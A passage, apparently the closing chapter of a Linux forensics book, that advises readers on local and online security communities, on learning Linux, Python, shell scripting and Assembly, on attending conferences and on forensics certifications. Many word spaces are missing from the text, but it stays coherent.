A good starting place might be a local DEFCON group. The list of groups (namedaccording to phone area codes) can be found at https://www.defcon.org/html/defcon-groups/dc-groups-index.html. If you live in a large city, youmight find that there is aDEFCON group in your area.What if you don’t live in a big city? E-mail the contactpeoplefromsomenearbygroupsandaskiftheyknowofanythinggoingoninyourarea,especiallyanythingrelatedtoforensics.

Localmeetings aregreat.Youcanmeet like-mindedpeople, andoften suchmeetingscan be fun. The problem with these meetings is that they tend to be infrequent. Evenmonthlymeetings are not enough interactionwith thebigger community.This iswhereonlinecommunitiescanbeextremelybeneficial.Whenyoujoinanonlinecommunity,you

haveaccesstomanyexpertsaroundtheworld,notjustpeoplewholivenearby.

A great online community to become a part of is the one at Pentester Academy(http://pentesteracademy.com). Pentester Academy goes beyond a couple of discussionforums by providing downloads related to this book and others published by theirpublicationbranch,authorinteraction,andagrowinglibraryofcourses.AnotherplusofPentesterAcademyisthatitisnotnarrowlyfocusedonthesubfieldofforensics.

If you areonly looking for aplace tohave forensicsdiscussions, youmight considergivingComputerForensicsWorld(http://computerforensicsworld.com)atry.Theyofferanumber of discussion forums.There is also a computer forensics community onReddit(http://reddit.com/r/computerforensics).

LEARNINGMOREHasthisbookand/orafewLinuxforensicsinvestigationsinspiredyoutolearnmore?Youcan never go wrong learning more about the fundamentals. Here is my list offundamentalseveryforensicspersonshouldknow:

Linux–thisistheplacefordoingforensics,evenifthesubjectisnotrunningLinuxPython–thishasbecomethedefactostandardforinformationsecuritypeopleShellscripting–sometimesPythonisoverkillorhastoomuchoverheadAssembly–agoodunderstandingofAssemblyhelpsyouunderstandeverything

What is the bestway to learnLinux?Use it.Really use it.Run it every day as yourprimaryoperating system.Donot just run a liveLinuxdistributionoccasionally. InstallLinuxonyourlaptop.YouwillneverlearnaboutLinuxadministrationfromaliveLinuxdistribution. Personally, I would stay away from a forensics-specific distribution, likeSIFT.Youwillbemuchbetteroff in the longruninstallingastandardversionofLinuxandthenaddingyourtools.Ifyouarenotsurewhattouse,somememberoftheUbuntufamily is agoodchoice as there is a large community towhich to turnwhenyouwantsupport.If,afterrunningLinuxforafewyears,youdecideyoureallywanttolearnLinuxonadeeperlevel,considerinstallingGentooLinux(http://gentoo.org)onsomethingotherthan your forensicsworkstation.Gentoo is a source-based distribution, and installing itcanbesimultaneouslyeducationalandextremelyfrustrating.

AswithLinux, thebestwaytolearnPythonis toreallyuseit.TherearemanybooksavailablethatclaimtoteachyouPython.ThefirstthingyoushouldrealizeisthatPythoncan be used as a scripting language or as a programming language.Most of the booksavailable treat Python as a programming language. What I mean by programminglanguage is a language forwriting largecomputerprograms (sayawordprocessoror agame).Inmyopinion,thereareotherlanguagesthatarebettersuitedforsuchtasks.

TolearnPythonscriptingrequiresaveryhands-onapproach.Thisisexactlywhatyouwill find in the Python course at Pentester Academy(http://www.pentesteracademy.com/course?id=1). Some might question thisrecommendation, given that this book is published by Pentester Academy. I have been

recommendingthiscourselongbeforeIproducedmyfirstvideoforPentesterAcademyorthere was even a notion of this book, however. Some other good resources includehttp://learnpythonthehardway.org, http://www.codecademy.com/en/tracks/python, andhttp://learnpython.org.

As much as I might like Python, there are times when shell scripting is moreappropriate. In general, when you primarily want to run some programs and/or do notneedtodoalotofcalculations,ashellscriptcanbeagoodchoice.Someonlineresourcesfor learning shell scripting include http://linuxcommand.org, http://linuxconfig.org/bash-scripting-tutorial,andhttp://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO.html.TwobooksonshellscriptingthatIwouldrecommendareWickedCoolShellScriptsbyDaveTaylor(2nd edition scheduled for September 2015 publication) andClassic Shell Scripting byArnoldRobinsandNelsonH.F.Beebe.Thelatterwaspublishedin2005butisstilloneofthebestbooksavailableonthistopic.

Why learn Assembly? A firm grasp of Assembly helps a person understand howcomputersworkatthelowestlevel.Assemblyistocomputersciencewhatcalculusistomathematicsandphysics.Justasknowingcalculusallowsyoutoinstantlymakesenseofeverythingfromyourhighschoolphysicsclass,learningAssemblywillmakewhatgoesonbehindthesceneswithhigh-levelprogramminglanguages(C,C++,etc.)crystalclear.

PentesterAcademyofferstwocoursesonAssemblyandshellcoding.Oneisfor32-bitsystemsand theother is for64-bitoperatingsystems.The32-bit and64-bit coursesareavailable at http://www.pentesteracademy.com/course?id=3 andhttp://www.pentesteracademy.com/course?id=7, respectively. Both of these courses willprovideyouwithabasicunderstandingofAssemblyandgowellbeyondwhathasbeencoveredinthisbook.

If you want to delve deeper into Assembly and explore topics not covered in thePentester Academy books mentioned above, you might enjoy Modern X86 AssemblyLanguageProgrammingbyDanielKusswurm.ThisbookcoversmanytopicsthatarenotcoveredbythePentesterAcademycourses(asthesecoursesarefocusedonthingsusedinshellcodingandreverseengineeringmalware).Theadditionaltopicsincludeitemssuchasusing floating-point registers and Advanced Vector Extensions (AVX) found in newprocessors.

CONGREGATEBeingpartofvibrantlocalandonlinecommunitiesisagreatthing.Nothingbeatsagreatconference,however.Manyof theresearchprojects Ihavedone in thepasthavebeenadirect resultofpeople Ihavemetanddiscussions Ihavehadat conferencesaround theworld. Conferences are a great place to network andmeet people with complementaryskillsetsandareasofexpertise.

A good starter list of forensics conferences can be found athttp://forensicswiki.org/wiki/Upcoming_events#Conferences. Forensics Magazine listssomeconferencesaswellathttp://www.forensicmag.com/events.Ihavenotfoundagoodmasterlistfordigitalforensicsconferences.YoumightwishtotryafewGooglesearches

tolocateconferencesdedicatedtoforensics.

There are many excellent information security conferences out there that offersomething for people interested in forensics.My two favorite places to find conferencelistingsareConciseCourses(http://concise-courses.com/security)andSECurityOrganizerandReporterExchange (http://secore.info). SECore offers a call for papers listingwithCFP closing dates for various conferences which can be handy if you have somethingexcitingtosharewithothers.

Nowthatyouhavefoundafewconferencestoattend,whatshouldyoudowhileyouarethere? Participate! If there is a forensics competition, and you have the time, considercompeting.Youmightnotwin,butyouarevirtuallyguaranteedtolearnalot.Oftenthereare people who will offer a little coaching for beginners in these competitions. Askquestions.Do not be afraid to talk to conference presenters.With very few exceptions,mostareapproachableandhappytotalkmoreabouttheirresearch.

Intentionallymeetnewpeople.Evenifyoutraveledtoaconferencewithagroup,findsomeoneyoudonotknowwithwhomtohaveamealat theconference.Overcomeanynaturaltendenciestowardintroversion.Ihaveattendedalotofconferences.Ihaveyettohave a negative outcome from introducing myself and sitting with someone new overlunch. If the conference offers any mixers or networking events, attend them if at allpossible.Itdoesnottakelongtobuildanetworkofpeoplewhomyoucanleverageinafutureinvestigation.

Nowforthehardestthingtodoatconferences:share.Manypeoplefalselyassumetheyhavenothingworthsharingbecausetheyarenewtoinformationsecurityand/orforensics.Everyoneisanexpertinsomething.Findanareayouenjoyandbecomeanexpertinthatarea. Share your expertise with others. You will quickly find that explaining things toothersenrichesyourownunderstanding.

Submitting a talk to a conference can be intimidating. Everyone gets rejected fromconferences. The key is not to take it personally. A rejected talk may be more of anindicatorofpoorfitwithathemeorothertalksofferedthanareflectionofthequalityofyoursubmission.Manyconferenceswillgiveyoufeedbackthatincludessuggestionsforfuturesubmissions.

Regional conferences, such asB-sides, can be a good place to start your career as aconferencepresenter.I’mnotsayingdonotsubmittothebigconferenceslikeDEFCON.Ifyoufeelcomfortableaddressinga fewthousandpeople foryourveryfirstconferencepresentation,thengorightahead.Ifyoufindpublicspeakingabitfrightening,youmightwanttostartwithaconferencesmallenoughthatyouwillhavelessthanahundredpeopleintheroomduringyourtalk.

CERTIFYGenerally speaking, certifications can help you get a job. This is especially true forindividuals just getting started in a career. Unfortunately, many of the recognizedcertifications require a certain level of experience that those just startingout donot yet

possess. The situation is even worse in the forensics field as some certificationorganizations require active full-time employmentwith a government entity. To furthercomplicatethings,thereisnouniversallyacceptedcertificationindigitalforensics.

Inthebroaderfieldofinformationsecurity,theCertifiedInformationSystemsSecurityProfessional (CISSP) from the International Information System Security CertificationConsortium(ISC)2 is considered to be the standard certification all practitioners shouldhold in many countries, including the United States. (ISC)2 offers a Certified CyberForensics Professional (CCFP) certification. Unlike the CISSP, the CCFP is notconsideredessentialbymanyorganizations.LiketheCISSP,ifyouwanttobeaCCFPbutyou lack experience, you can take the test and become an Associate of (ISC)2 who isgrantedthecertificationlaterafteryouhaveobtainedtherequiredexperience.

Many of the forensics certifications that are not tied to government employment areissuedbyvendors.GiventheopensourcenatureofLinux,certificationsspecifictoLinuxforensicsappeartobenon-existentatthistime.Thenetofallofthisisthatyoushouldbecautiousaboutspendingmoneyonforensicscertificationsunlessyouknowtheywillberequiredforaspecificjob.

SUMMARYWehavecoveredalotofgroundinthisbook.Ihopeyouhaveenjoyedthejourney.Wehave laid a foundation that should help you perform investigations of Linux systems.WhatmaynotbeimmediatelyapparentisthatbylearninghowtodoforensicsinLinux,youhavealsolearnedaconsiderableamountabouthowtoinvestigateWindowssystemsonaLinux-basedforensicsworkstationaswell.Thatisthesubjectforanotherbook.Untilthen,solongfornow,andenjoyyourLinuxinvestigations.